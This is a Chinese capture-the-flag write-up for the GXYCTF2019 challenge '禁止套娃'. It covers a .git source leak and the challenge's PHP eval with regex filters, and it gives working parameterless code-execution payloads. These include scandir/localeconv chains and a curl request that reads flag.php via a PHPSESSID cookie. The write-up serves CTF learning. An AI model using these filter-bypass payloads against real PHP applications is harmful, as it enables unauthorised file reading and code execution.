[GXYCTF2019]禁止套娃

[GXYCTF2019]禁止套娃

考点

  • .git泄露

  • 无参RCE

wp

目录扫描发现.git泄露,GitHack下载源码,或者用Git_Extract

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

/[a-z,_]+((?R)?)/这个正则匹配a(b(c()))这种形式的字符串,典型的无参RCE

  • localeconv()返回一个数组,数组第一位是.

  • end()输出数组中的最后一个元素

  • next()输出数组中的下一个元素

  • prev()输出数组中的上一个元素

  • reset()输出数组中的第一个元素

  • each()返回当前元素的键名和键值,并将内部指针向前移动

  • array_reverse()将数组逆序输出

payload:?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

  • session_start()开启session

  • session_id()获取HTTP请求头中PHPSESSID的值

payload:

curl "http://9f308f9e-cc84-45b0-8ff7-c087bfc23b8f.node4.buuoj.cn/?exp=readfile(session_id(session_start()));" --cookie "PHPSESSID=flag.php"

小结

  1. 除上述函数外,还可以使用getallheaders()

  2. 通过chr(ord(strrev(crypt(serialize(array())))))获取/

  3. 通过chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))获取.

上一页Wallbreaker_Easy下一页[CISCN 2019 初赛]Love Math

最后更新于